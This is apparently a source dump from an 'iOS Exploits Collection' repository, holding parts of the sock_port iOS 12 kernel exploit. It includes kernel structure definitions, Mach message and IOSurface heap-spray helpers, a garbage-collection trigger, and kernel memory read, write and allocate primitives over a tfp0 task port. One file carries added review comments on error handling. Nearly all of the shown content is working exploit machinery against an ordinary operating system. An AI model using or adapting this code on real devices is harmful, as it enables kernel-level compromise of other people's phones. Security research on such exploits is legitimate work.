-------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // sock_port 4 | // 5 | // Created by Jake James on 7/17/19. 6 | // Copyright © 2019 Jake James. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | 13 | 14 | @end 15 | 16 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/ViewController.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // sock_port 4 | // 5 | // Created by Jake James on 7/17/19. 6 | // Copyright © 2019 Jake James. All rights reserved. 7 | // 8 | 9 | #import "ViewController.h" 10 | 11 | @interface ViewController () 12 | 13 | @end 14 | 15 | @implementation ViewController 16 | 17 | - (void)viewDidLoad { 18 | [super viewDidLoad]; 19 | // Do any additional setup after loading the view, typically from a nib. 20 | } 21 | 22 | 23 | - (void)didReceiveMemoryWarning { 24 | [super didReceiveMemoryWarning]; 25 | // Dispose of any resources that can be recreated. 26 | } 27 | 28 | 29 | @end 30 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/exploit.h: -------------------------------------------------------------------------------- 1 | // 2 | // exploit.h 3 | // sock_port 4 | // 5 | // Created by Jake James on 7/17/19. 6 | // Copyright © 2019 Jake James. All rights reserved. 
7 | // 8 | 9 | #ifndef exploit_h 10 | #define exploit_h 11 | 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | #include "exploit_utilities.h" 21 | #include "kernel_memory.h" 22 | 23 | #define IPV6_USE_MIN_MTU 42 24 | #define IPV6_PKTINFO 46 25 | #define IPV6_PREFER_TEMPADDR 63 26 | 27 | struct route_in6 { 28 | struct rtentry *ro_rt; 29 | struct llentry *ro_lle; 30 | struct ifaddr *ro_srcia; 31 | uint32_t ro_flags; 32 | struct sockaddr_in6 ro_dst; 33 | }; 34 | 35 | struct ip6po_rhinfo { 36 | struct ip6_rthdr *ip6po_rhi_rthdr; /* Routing header */ 37 | struct route_in6 ip6po_rhi_route; /* Route to the 1st hop */ 38 | }; 39 | 40 | struct ip6po_nhinfo { 41 | struct sockaddr *ip6po_nhi_nexthop; 42 | struct route_in6 ip6po_nhi_route; /* Route to the nexthop */ 43 | }; 44 | 45 | struct ip6_pktopts { 46 | struct mbuf *ip6po_m; 47 | int ip6po_hlim; 48 | struct in6_pktinfo *ip6po_pktinfo; 49 | struct ip6po_nhinfo ip6po_nhinfo; 50 | struct ip6_hbh *ip6po_hbh; 51 | struct ip6_dest *ip6po_dest1; 52 | struct ip6po_rhinfo ip6po_rhinfo; 53 | struct ip6_dest *ip6po_dest2; 54 | int ip6po_tclass; 55 | int ip6po_minmtu; 56 | int ip6po_prefer_tempaddr; 57 | int ip6po_flags; 58 | }; 59 | 60 | #define IO_BITS_ACTIVE 0x80000000 61 | #define IOT_PORT 0 62 | #define IKOT_TASK 2 63 | #define IKOT_CLOCK 25 64 | #define IKOT_IOKIT_CONNECT 29 65 | 66 | typedef volatile struct { 67 | uint32_t ip_bits; 68 | uint32_t ip_references; 69 | struct { 70 | uint64_t data; 71 | uint64_t type; 72 | } ip_lock; // spinlock 73 | struct { 74 | struct { 75 | struct { 76 | uint32_t flags; 77 | uint32_t waitq_interlock; 78 | uint64_t waitq_set_id; 79 | uint64_t waitq_prepost_id; 80 | struct { 81 | uint64_t next; 82 | uint64_t prev; 83 | } waitq_queue; 84 | } waitq; 85 | uint64_t messages; 86 | uint32_t seqno; 87 | uint32_t receiver_name; 88 | uint16_t msgcount; 89 | uint16_t qlimit; 90 | uint32_t pad; 91 | } port; 92 | uint64_t klist; 93 | } ip_messages; 94 | 
uint64_t ip_receiver; 95 | uint64_t ip_kobject; 96 | uint64_t ip_nsrequest; 97 | uint64_t ip_pdrequest; 98 | uint64_t ip_requests; 99 | uint64_t ip_premsg; 100 | uint64_t ip_context; 101 | uint32_t ip_flags; 102 | uint32_t ip_mscount; 103 | uint32_t ip_srights; 104 | uint32_t ip_sorights; 105 | } kport_t; 106 | 107 | typedef struct { 108 | struct { 109 | uint64_t data; 110 | uint32_t reserved : 24, 111 | type : 8; 112 | uint32_t pad; 113 | } lock; // mutex lock 114 | uint32_t ref_count; 115 | uint32_t active; 116 | uint32_t halting; 117 | uint32_t pad; 118 | uint64_t map; 119 | } ktask_t; 120 | 121 | #define WQT_QUEUE 0x2 122 | #define _EVENT_MASK_BITS ((sizeof(uint32_t) * 8) - 7) 123 | 124 | union waitq_flags { 125 | struct { 126 | uint32_t /* flags */ 127 | waitq_type:2, /* only public field */ 128 | waitq_fifo:1, /* fifo wakeup policy? */ 129 | waitq_prepost:1, /* waitq supports prepost? */ 130 | waitq_irq:1, /* waitq requires interrupts disabled */ 131 | waitq_isvalid:1, /* waitq structure is valid */ 132 | waitq_turnstile_or_port:1, /* waitq is embedded in a turnstile (if irq safe), or port (if not irq safe) */ 133 | waitq_eventmask:_EVENT_MASK_BITS; 134 | }; 135 | uint32_t flags; 136 | }; 137 | 138 | 139 | mach_port_t get_tfp0(void); 140 | 141 | #endif /* exploit_h */ 142 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/exploit_utilities.c: -------------------------------------------------------------------------------- 1 | // 2 | // exploit_utilities.c 3 | // sock_port 4 | // 5 | // Created by Jake James on 7/17/19. 6 | // Copyright © 2019 Jake James. All rights reserved. 7 | // 8 | 9 | #include "exploit_utilities.h" 10 | 11 | // from Ian Beer. 
make a kernel allocation with the kernel address of 'target_port', 'count' times 12 | mach_port_t fill_kalloc_with_port_pointer(mach_port_t target_port, int count, int disposition) { 13 | mach_port_t q = MACH_PORT_NULL; 14 | kern_return_t err; 15 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q); 16 | if (err != KERN_SUCCESS) { 17 | printf("[-] failed to allocate port\n"); 18 | return 0; 19 | } 20 | 21 | mach_port_t* ports = malloc(sizeof(mach_port_t) * count); 22 | for (int i = 0; i < count; i++) { 23 | ports[i] = target_port; 24 | } 25 | 26 | struct ool_msg* msg = (struct ool_msg*)calloc(1, sizeof(struct ool_msg)); 27 | 28 | msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0); 29 | msg->hdr.msgh_size = (mach_msg_size_t)sizeof(struct ool_msg); 30 | msg->hdr.msgh_remote_port = q; 31 | msg->hdr.msgh_local_port = MACH_PORT_NULL; 32 | msg->hdr.msgh_id = 0x41414141; 33 | 34 | msg->body.msgh_descriptor_count = 1; 35 | 36 | msg->ool_ports.address = ports; 37 | msg->ool_ports.count = count; 38 | msg->ool_ports.deallocate = 0; 39 | msg->ool_ports.disposition = disposition; 40 | msg->ool_ports.type = MACH_MSG_OOL_PORTS_DESCRIPTOR; 41 | msg->ool_ports.copy = MACH_MSG_PHYSICAL_COPY; 42 | 43 | err = mach_msg(&msg->hdr, 44 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE, 45 | msg->hdr.msgh_size, 46 | 0, 47 | MACH_PORT_NULL, 48 | MACH_MSG_TIMEOUT_NONE, 49 | MACH_PORT_NULL); 50 | 51 | if (err != KERN_SUCCESS) { 52 | printf("[-] failed to send message: %s\n", mach_error_string(err)); 53 | return MACH_PORT_NULL; 54 | } 55 | 56 | return q; 57 | } 58 | 59 | // Ian Beer 60 | size_t message_size_for_kalloc_size(size_t kalloc_size) { 61 | return ((3 * kalloc_size) / 4) - 0x74; 62 | } 63 | 64 | // Ian Beer 65 | mach_port_t send_kalloc_message(uint8_t *replacer_message_body, uint32_t replacer_body_size) { 66 | mach_port_t q = MACH_PORT_NULL; 67 | kern_return_t err; 68 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, 
&q); 69 | if (err != KERN_SUCCESS) { 70 | printf("[-] failed to allocate port\n"); 71 | return MACH_PORT_NULL; 72 | } 73 | 74 | mach_port_limits_t limits = {0}; 75 | limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE; 76 | err = mach_port_set_attributes(mach_task_self(), 77 | q, 78 | MACH_PORT_LIMITS_INFO, 79 | (mach_port_info_t)&limits, 80 | MACH_PORT_LIMITS_INFO_COUNT); 81 | if (err != KERN_SUCCESS) { 82 | printf("[-] failed to increase queue limit\n"); 83 | return MACH_PORT_NULL; 84 | } 85 | 86 | mach_msg_size_t msg_size = sizeof(struct simple_msg) + replacer_body_size; 87 | struct simple_msg *msg = (struct simple_msg *)malloc(msg_size); 88 | memset(msg, 0, sizeof(struct simple_msg)); 89 | memcpy(&msg->buf[0], replacer_message_body, replacer_body_size); 90 | 91 | for (int i = 0; i < 256; i++) { 92 | msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0); 93 | msg->hdr.msgh_size = msg_size; 94 | msg->hdr.msgh_remote_port = q; 95 | msg->hdr.msgh_local_port = MACH_PORT_NULL; 96 | msg->hdr.msgh_id = 0x41414142; 97 | 98 | err = mach_msg(&msg->hdr, 99 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE, 100 | msg_size, 101 | 0, 102 | MACH_PORT_NULL, 103 | MACH_MSG_TIMEOUT_NONE, 104 | MACH_PORT_NULL); 105 | 106 | if (err != KERN_SUCCESS) { 107 | printf("[-] failed to send message %x (%d): %s\n", err, i, mach_error_string(err)); 108 | return MACH_PORT_NULL; 109 | } 110 | } 111 | 112 | return q; 113 | } 114 | 115 | // rest is from machswap 116 | void trigger_gc() { 117 | const int gc_ports_cnt = 100; 118 | int gc_ports_max = gc_ports_cnt; 119 | mach_port_t gc_ports[gc_ports_cnt] = { 0 }; 120 | 121 | uint32_t body_size = (uint32_t)message_size_for_kalloc_size(16384) - sizeof(mach_msg_header_t); // 1024 122 | uint8_t *body = (uint8_t*)malloc(body_size); 123 | memset(body, 0x41, body_size); 124 | 125 | for (int i = 0; i < gc_ports_cnt; i++) { 126 | uint64_t t0, t1; 127 | 128 | t0 = mach_absolute_time(); 129 | gc_ports[i] = send_kalloc_message(body, body_size); 130 | t1 = 
mach_absolute_time(); 131 | 132 | if (t1 - t0 > 1000000) { 133 | printf("[+] got gc at %d -- breaking\n", i); 134 | gc_ports_max = i; 135 | break; 136 | } 137 | } 138 | 139 | for (int i = 0; i < gc_ports_max; i++) { 140 | mach_port_destroy(mach_task_self(), gc_ports[i]); 141 | } 142 | 143 | sched_yield(); 144 | sleep(1); 145 | } 146 | 147 | mach_vm_size_t pagesize = 0; 148 | 149 | const uint64_t IOSURFACE_CREATE_SURFACE = 0; 150 | const uint64_t IOSURFACE_SET_VALUE = 9; 151 | const uint64_t IOSURFACE_GET_VALUE = 10; 152 | const uint64_t IOSURFACE_DELETE_VALUE = 11; 153 | 154 | int init_IOSurface() { 155 | kern_return_t ret = KERN_SUCCESS; 156 | 157 | ret = _host_page_size(mach_host_self(), (vm_size_t*)&pagesize); 158 | printf("[i] page size: 0x%llx, %s\n", pagesize, mach_error_string(ret)); 159 | if (ret != KERN_SUCCESS) { 160 | printf("[-] failed to get page size! ret: %x %s\n", ret, mach_error_string(ret)); 161 | return ret; 162 | } 163 | return !IOSurface_init(); 164 | } 165 | 166 | void deinit_IOSurface() { 167 | IOSurface_deinit(); 168 | } 169 | 170 | int spray_IOSurface(void *data, size_t size) { 171 | return !IOSurface_spray_with_gc(32, 256, data, (uint32_t)size, NULL); 172 | } 173 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/exploit_utilities.h: -------------------------------------------------------------------------------- 1 | // 2 | // exploit_utilities.h 3 | // sock_port 4 | // 5 | // Created by Jake James on 7/17/19. 6 | // Copyright © 2019 Jake James. All rights reserved. 
7 | // 8 | 9 | #ifndef exploit_utilities_h 10 | #define exploit_utilities_h 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include "iosurface.h" 22 | 23 | struct ool_msg { 24 | mach_msg_header_t hdr; 25 | mach_msg_body_t body; 26 | mach_msg_ool_ports_descriptor_t ool_ports; 27 | }; 28 | 29 | struct simple_msg { 30 | mach_msg_header_t hdr; 31 | char buf[0]; 32 | }; 33 | 34 | size_t message_size_for_kalloc_size(size_t kalloc_size); 35 | mach_port_t fill_kalloc_with_port_pointer(mach_port_t target_port, int count, int disposition); 36 | mach_port_t send_kalloc_message(uint8_t *replacer_message_body, uint32_t replacer_body_size); 37 | void trigger_gc(void); 38 | 39 | enum { 40 | kIOCFSerializeToBinary = 0x00000001U, 41 | }; 42 | 43 | #define kOSSerializeBinarySignature 0x000000D3U 44 | 45 | enum { 46 | kOSSerializeDictionary = 0x01000000U, 47 | kOSSerializeArray = 0x02000000U, 48 | kOSSerializeSet = 0x03000000U, 49 | kOSSerializeNumber = 0x04000000U, 50 | kOSSerializeSymbol = 0x08000000U, 51 | kOSSerializeString = 0x09000000U, 52 | kOSSerializeData = 0x0a000000U, 53 | kOSSerializeBoolean = 0x0b000000U, 54 | kOSSerializeObject = 0x0c000000U, 55 | 56 | kOSSerializeTypeMask = 0x7F000000U, 57 | kOSSerializeDataMask = 0x00FFFFFFU, 58 | 59 | kOSSerializeEndCollection = 0x80000000U, 60 | 61 | kOSSerializeMagic = 0x000000d3U, 62 | }; 63 | 64 | extern mach_vm_size_t pagesize; 65 | 66 | extern const uint64_t IOSURFACE_CREATE_SURFACE; 67 | extern const uint64_t IOSURFACE_SET_VALUE; 68 | extern const uint64_t IOSURFACE_GET_VALUE; 69 | extern const uint64_t IOSURFACE_DELETE_VALUE; 70 | 71 | int init_IOSurface(void); 72 | void deinit_IOSurface(void); 73 | int spray_IOSurface(void *data, size_t size); 74 | 75 | #endif /* exploit_utilities_h */ 76 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel 
Exploits/sock_port/sock_port/include/IOKit/OSMessageNotification.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. Please obtain a copy of the License at 10 | * http://www.opensource.apple.com/apsl/ and read it before using this 11 | * file. 12 | * 13 | * The Original Code and all software distributed under the License are 14 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 15 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 16 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 17 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 18 | * Please see the License for the specific language governing rights and 19 | * limitations under the License. 20 | * 21 | * @APPLE_LICENSE_HEADER_END@ 22 | */ 23 | /* 24 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 
25 | * 26 | * HISTORY 27 | * 28 | */ 29 | 30 | #ifndef __OS_OSMESSAGENOTIFICATION_H 31 | #define __OS_OSMESSAGENOTIFICATION_H 32 | 33 | #ifdef __cplusplus 34 | extern "C" { 35 | #endif 36 | 37 | #include 38 | #include "IOReturn.h" 39 | 40 | enum { 41 | kFirstIOKitNotificationType = 100, 42 | kIOServicePublishNotificationType = 100, 43 | kIOServiceMatchedNotificationType = 101, 44 | kIOServiceTerminatedNotificationType = 102, 45 | kIOAsyncCompletionNotificationType = 150, 46 | kIOServiceMessageNotificationType = 160, 47 | kLastIOKitNotificationType = 199 48 | }; 49 | 50 | enum { 51 | kOSNotificationMessageID = 53, 52 | kOSAsyncCompleteMessageID = 57, 53 | kMaxAsyncArgs = 16 54 | }; 55 | 56 | enum { 57 | kIOAsyncReservedIndex = 0, 58 | kIOAsyncReservedCount, 59 | 60 | kIOAsyncCalloutFuncIndex = kIOAsyncReservedCount, 61 | kIOAsyncCalloutRefconIndex, 62 | kIOAsyncCalloutCount, 63 | 64 | kIOMatchingCalloutFuncIndex = kIOAsyncReservedCount, 65 | kIOMatchingCalloutRefconIndex, 66 | kIOMatchingCalloutCount, 67 | 68 | kIOInterestCalloutFuncIndex = kIOAsyncReservedCount, 69 | kIOInterestCalloutRefconIndex, 70 | kIOInterestCalloutServiceIndex, 71 | kIOInterestCalloutCount 72 | }; 73 | 74 | enum { 75 | kOSAsyncRefCount = 8, 76 | kOSAsyncRefSize = 32 77 | }; 78 | typedef natural_t OSAsyncReference[kOSAsyncRefCount]; 79 | 80 | struct OSNotificationHeader { 81 | vm_size_t size; /* content size */ 82 | natural_t type; 83 | OSAsyncReference reference; 84 | 85 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L) 86 | unsigned char content[]; 87 | #else 88 | unsigned char content[0]; 89 | #endif 90 | }; 91 | 92 | struct IOServiceInterestContent { 93 | natural_t messageType; 94 | void * messageArgument[1]; 95 | }; 96 | 97 | struct IOAsyncCompletionContent { 98 | IOReturn result; 99 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L) 100 | void * args[]; 101 | #else 102 | void * args[0]; 103 | #endif 104 | }; 105 | 106 | #ifndef __cplusplus 107 | typedef 
struct OSNotificationHeader OSNotificationHeader; 108 | typedef struct IOServiceInterestContent IOServiceInterestContent; 109 | typedef struct IOAsyncCompletionContent IOAsyncCompletionContent; 110 | #endif 111 | 112 | #ifdef __cplusplus 113 | } 114 | #endif 115 | 116 | #endif /* __OS_OSMESSAGENOTIFICATION_H */ 117 | 118 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/iosurface.h: -------------------------------------------------------------------------------- 1 | /* 2 | * iosurface.h 3 | * Brandon Azad 4 | */ 5 | #ifndef VOUCHER_SWAP__IOSURFACE_H_ 6 | #define VOUCHER_SWAP__IOSURFACE_H_ 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | #include "exploit_utilities.h" 17 | 18 | #ifdef IOSURFACE_EXTERN 19 | #define extern IOSURFACE_EXTERN 20 | #endif 21 | 22 | // The IOSurfaceRoot service. 23 | extern mach_port_t IOSurfaceRoot; 24 | 25 | // An IOSurfaceRootUserClient instance. 26 | extern mach_port_t IOSurfaceRootUserClient; 27 | 28 | // The ID of the IOSurface we're using. 29 | extern uint32_t IOSurface_id; 30 | 31 | /* 32 | * IOSurface_init 33 | * 34 | * Description: 35 | * Initialize the IOSurface subsystem. 36 | */ 37 | bool IOSurface_init(void); 38 | 39 | /* 40 | * IOSurface_deinit 41 | * 42 | * Description: 43 | * Tear down the IOSurface subsystem. Any sprayed memory will be automatically deallocated. 44 | */ 45 | void IOSurface_deinit(void); 46 | 47 | /* 48 | * IOSurface_spray_with_gc 49 | * 50 | * Description: 51 | * Spray kernel memory using IOSurface properties. 52 | * 53 | * The current implementation stores each data allocation in an OSString. The reason for this 54 | * is that OSString contents will be allocated using kalloc() even for allocations larger than 55 | * the page size. OSData on the other hand will use kmem_alloc() for large allocations. 
56 | * Consequently, the last byte of data will be zeroed out to create a null terminator. 57 | */ 58 | bool IOSurface_spray_with_gc(uint32_t array_count, uint32_t array_length, 59 | void *data, uint32_t data_size, 60 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)); 61 | 62 | /* 63 | * IOSurface_spray_size_with_gc 64 | * 65 | * Description: 66 | * Spray kernel memory using IOSurface properties. 67 | * 68 | * This function computes the number of elements per array automatically. 69 | */ 70 | bool IOSurface_spray_size_with_gc(uint32_t array_count, size_t spray_size, 71 | void *data, uint32_t data_size, 72 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)); 73 | 74 | /* 75 | * IOSurface_spray_read_array 76 | * 77 | * Description: 78 | * Read back the data elements in a particular array in a particular IOSurface spray. 79 | */ 80 | bool IOSurface_spray_read_array(uint32_t array_id, uint32_t array_length, uint32_t data_size, 81 | void (^callback)(uint32_t data_id, void *data, size_t size)); 82 | 83 | /* 84 | * IOSurface_spray_read_all_data 85 | * 86 | * Description: 87 | * Read back all the data elements in an IOSurface spray. 88 | */ 89 | bool IOSurface_spray_read_all_data(uint32_t array_count, uint32_t array_length, uint32_t data_size, 90 | void (^callback)(uint32_t array_id, uint32_t data_id, void *data, size_t size)); 91 | 92 | /* 93 | * IOSurface_spray_remove_array 94 | * 95 | * Description: 96 | * Remove a particular array from an IOSurface spray, freeing the contained data elements. 97 | */ 98 | bool IOSurface_spray_remove_array(uint32_t array_id); 99 | 100 | /* 101 | * IOSurface_spray_clear 102 | * 103 | * Description: 104 | * Remove all the arrays from an IOSurface spray, freeing all the data elements. 
105 | */ 106 | bool IOSurface_spray_clear(uint32_t array_count); 107 | 108 | // ---- IOSurface types --------------------------------------------------------------------------- 109 | 110 | struct _IOSurfaceFastCreateArgs { 111 | uint64_t address; 112 | uint32_t width; 113 | uint32_t height; 114 | uint32_t pixel_format; 115 | uint32_t bytes_per_element; 116 | uint32_t bytes_per_row; 117 | uint32_t alloc_size; 118 | }; 119 | 120 | struct IOSurfaceLockResult { 121 | uint64_t addr1; 122 | uint64_t addr2; 123 | uint64_t addr3; 124 | uint32_t surface_id; 125 | uint8_t _pad2[0xdd0-0x18-0x4]; 126 | }; 127 | 128 | struct IOSurfaceValueArgs { 129 | uint32_t surface_id; 130 | uint32_t _out1; 131 | union { 132 | uint32_t xml[0]; 133 | char string[0]; 134 | }; 135 | }; 136 | 137 | struct IOSurfaceValueArgs_string { 138 | uint32_t surface_id; 139 | uint32_t _out1; 140 | uint32_t string_data; 141 | char null; 142 | }; 143 | 144 | struct IOSurfaceValueResultArgs { 145 | uint32_t out; 146 | }; 147 | 148 | 149 | bool IOSurface_set_value(const struct IOSurfaceValueArgs *args, size_t args_size); 150 | 151 | #undef extern 152 | 153 | #endif 154 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/kernel_memory.c: -------------------------------------------------------------------------------- 1 | // 2 | // kernel_memory.c 3 | // sock_port 4 | // 5 | // Created by Jake James on 7/18/19. 6 | // Copyright © 2019 Jake James. All rights reserved. 
//

#include "kernel_memory.h"

/*
 * Task port handed in once through init_kernel_memory(). Every primitive in
 * this file issues its Mach VM calls against this port, so none of them does
 * anything useful until it has been set.
 */
static mach_port_t tfpzero;

/*
 * init_kernel_memory
 *
 * Description:
 *     Record the task port used by the read/write/allocate primitives below.
 *     The value is only stored; the port is not validated.
 *
 * Parameters:
 *     tfp0    Task port with kernel memory access.
 */
void init_kernel_memory(mach_port_t tfp0) {
    tfpzero = tfp0;
}

/*
 * kalloc
 *
 * Description:
 *     Allocate `size` bytes in the tfpzero task's VM map at an address chosen
 *     by the kernel (VM_FLAGS_ANYWHERE).
 *
 * Returns:
 *     The allocated address. `address` starts at 0 and the kern_return_t of
 *     mach_vm_allocate() is discarded, so a failed call presumably comes back
 *     as 0; callers have to treat 0 as failure.
 *
 * NOTE(review): the return code should be checked rather than inferred from
 *     the address value.
 */
uint64_t kalloc(vm_size_t size) {
    mach_vm_address_t address = 0;
    mach_vm_allocate(tfpzero, (mach_vm_address_t *)&address, size, VM_FLAGS_ANYWHERE);
    return address;
}

/*
 * kfree
 *
 * Description:
 *     Release a region previously obtained from kalloc(). The result of
 *     mach_vm_deallocate() is discarded, so a failed deallocation is silent.
 */
void kfree(mach_vm_address_t address, vm_size_t size) {
    mach_vm_deallocate(tfpzero, address, size);
}

/*
 * kread
 *
 * Description:
 *     Copy `size` bytes from address `where` in the tfpzero task into the
 *     local buffer `p`, in chunks of at most 2048 bytes via
 *     mach_vm_read_overwrite().
 *
 * Returns:
 *     The number of bytes actually copied. The loop stops at the first chunk
 *     that fails (non-zero return code or zero bytes returned), so a result
 *     smaller than `size` is a short read and the tail of `p` is untouched.
 *     Callers that ignore the return value cannot tell the two apart.
 *
 * NOTE(review): `rv` is declared int while the prototype in kernel_memory.h
 *     returns kern_return_t. The error message prints the base `where`, not
 *     `where + offset`, so for multi-chunk reads the reported address is not
 *     the one that failed.
 */
size_t kread(uint64_t where, void *p, size_t size) {
    int rv;
    size_t offset = 0;
    while (offset < size) {
        mach_vm_size_t sz, chunk = 2048;
        // The last chunk is shortened to the remaining byte count.
        if (chunk > size - offset) {
            chunk = size - offset;
        }
        rv = mach_vm_read_overwrite(tfpzero, where + offset, chunk, (mach_vm_address_t)p + offset, &sz);
        if (rv || sz == 0) {
            printf("[-] error on kread(0x%016llx)\n", where);
            break;
        }
        offset += sz;
    }
    return offset;
}

/*
 * rk32
 *
 * Description:
 *     Read a 32-bit value at kernel address `where`.
 *
 * Returns:
 *     The value read. `out` is not initialised and kread()'s byte count is
 *     ignored, so on a failed read the result is indeterminate rather than an
 *     error; callers cannot distinguish the two cases.
 */
uint32_t rk32(uint64_t where) {
    uint32_t out;
    kread(where, &out, sizeof(uint32_t));
    return out;
}

/*
 * rk64
 *
 * Description:
 *     Read a 64-bit value at kernel address `where`.
 *
 * Returns:
 *     The value read. As with rk32(), `out` is uninitialised and the byte
 *     count from kread() is ignored, so a failed read returns garbage.
 */
uint64_t rk64(uint64_t where) {
    uint64_t out;
    kread(where, &out, sizeof(uint64_t));
    return out;
}

/*
 * kwrite
 *
 * Description:
 *     Copy `size` bytes from the local buffer `p` to address `where` in the
 *     tfpzero task, in chunks of at most 2048 bytes via mach_vm_write().
 *
 * Returns:
 *     The number of bytes the loop believes it wrote. mach_vm_write() reports
 *     no byte count, so every successful call is assumed to have written the
 *     whole chunk; the loop stops at the first non-zero return code.
 *
 * NOTE(review): the chunk length is narrowed to int for the
 *     mach_msg_type_number_t parameter (harmless here because chunk <= 2048),
 *     and the error message prints the base `where` rather than the failing
 *     chunk's address, as in kread().
 */
size_t kwrite(uint64_t where, const void *p, size_t size) {
    int rv;
    size_t offset = 0;
    while (offset < size) {
        size_t chunk = 2048;
        // The last chunk is shortened to the remaining byte count.
        if (chunk > size - offset) {
            chunk = size - offset;
        }
        rv = mach_vm_write(tfpzero, where + offset, (mach_vm_offset_t)p + offset, (int)chunk);
        if (rv) {
            printf("[-] error on kwrite(0x%016llx)\n", where);
            break;
        }
        offset += chunk;
    }
    return offset;
}

/*
 * wk32
 *
 * Description:
 *     Write the 32-bit value `what` at kernel address `where`. The value is
 *     copied to a local so a pointer to it can be handed to kwrite(); the
 *     byte count kwrite() returns is ignored, so a failed write is silent
 *     apart from kwrite()'s own message.
 */
void wk32(uint64_t where, uint32_t what) {
    uint32_t _what = what;
    kwrite(where, &_what, sizeof(uint32_t));
}

/*
 * wk64
 *
 * Description:
 *     Write the 64-bit value `what` at kernel address `where`. Same contract
 *     and same silent-failure caveat as wk32().
 */
void wk64(uint64_t where, uint64_t what) {
    uint64_t _what = what;
    kwrite(where, &_what, sizeof(uint64_t));
}

/*
 * find_port
 *
 * Description:
 *     Resolve the kernel address of the ipc_port behind Mach port name `port`
 *     in the task whose port object lives at `task_self`. The walk is
 *     ip_kobject -> task -> itk_space -> is_table, using the koffset() values
 *     from offsets.h, and the table is indexed with (port >> 8) multiplied by
 *     a hard-coded 0x18 entry size. Every hop goes through rk64(), so a
 *     failed read yields an indeterminate pointer rather than an error.
 *
 * Returns:
 *     The ipc_port address read from the entry, or garbage on a failed read.
 */
uint64_t
find_port(mach_port_name_t port, uint64_t task_self) { 87 | uint64_t task_addr = rk64(task_self + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 88 | uint64_t itk_space = rk64(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE)); 89 | uint64_t is_table = rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE)); 90 | 91 | uint32_t port_index = port >> 8; 92 | const int sizeof_ipc_entry_t = 0x18; 93 | 94 | uint64_t port_addr = rk64(is_table + (port_index * sizeof_ipc_entry_t)); 95 | 96 | return port_addr; 97 | } 98 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/kernel_memory.h: -------------------------------------------------------------------------------- 1 | // 2 | // kernel_memory.h 3 | // sock_port 4 | // 5 | // Created by Jake James on 7/18/19. 6 | // Copyright © 2019 Jake James. All rights reserved. 7 | // 8 | 9 | #ifndef kernel_memory_h 10 | #define kernel_memory_h 11 | 12 | #include 13 | #include 14 | #include "offsets.h" 15 | 16 | kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags); 17 | kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize); 18 | kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt); 19 | kern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t address, mach_vm_size_t size);; 20 | kern_return_t mach_vm_read(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, vm_offset_t *data, mach_msg_type_number_t *dataCnt); 21 | 22 | void init_kernel_memory(mach_port_t tfp0); 23 | 24 | size_t kread(uint64_t where, void *p, size_t size); 25 | uint32_t rk32(uint64_t where); 26 | uint64_t rk64(uint64_t where); 27 | 28 | size_t kwrite(uint64_t where, const void *p, size_t size); 29 | void 
